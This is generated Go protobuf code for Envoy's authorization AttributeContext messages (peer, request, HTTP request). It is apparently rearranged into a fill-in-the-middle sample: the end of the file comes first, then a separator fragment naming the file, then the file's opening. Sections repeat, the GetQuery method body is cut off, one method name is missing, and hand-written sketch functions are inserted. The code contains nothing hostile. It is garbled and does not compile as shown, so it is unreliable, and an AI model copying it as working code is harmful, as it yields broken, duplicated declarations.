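func examplePeerSketch() *AttributeContext_Peer {
	return &AttributeContext_Peer{
		Service:   "frontend", // x-envoy-downstream-service-cluster
		Labels:    map[string]string{"app": "frontend", "version": "v2"},
		Principal: "spiffe://cluster.local/ns/default/sa/frontend",
	}
}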
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
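// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// Wrapping an HTTP request together with its arrival time. The timestamp
// package is already imported by this file; the Seconds value is arbitrary.
func exampleRequestSketch(httpReq *AttributeContext_HttpRequest) *AttributeContext_Request {
	return &AttributeContext_Request{
		Time: &timestamp.Timestamp{Seconds: 1700000000}, // first byte of the request
		Http: httpReq,
	}
}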
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or `Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil |
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
}
| {
return m.Query
} | conditional_block |
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi-hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi-hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) | () *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer; this is typically the IP address.
// It can also be a UDS path, or another kind of address.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identity of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or `Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
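// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// How an authorization server might dump the merged, lower-cased headers of
// an incoming request; fmt is already imported above, and a nil Headers map
// simply ranges zero times.
func exampleDumpHeadersSketch(req *AttributeContext_HttpRequest) {
	fmt.Printf("%s %s (%s)\n", req.GetMethod(), req.GetPath(), req.GetProtocol())
	for name, value := range req.GetHeaders() {
		fmt.Printf("  %s: %s\n", name, value)
	}
}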
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil {
return m.Query
}
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
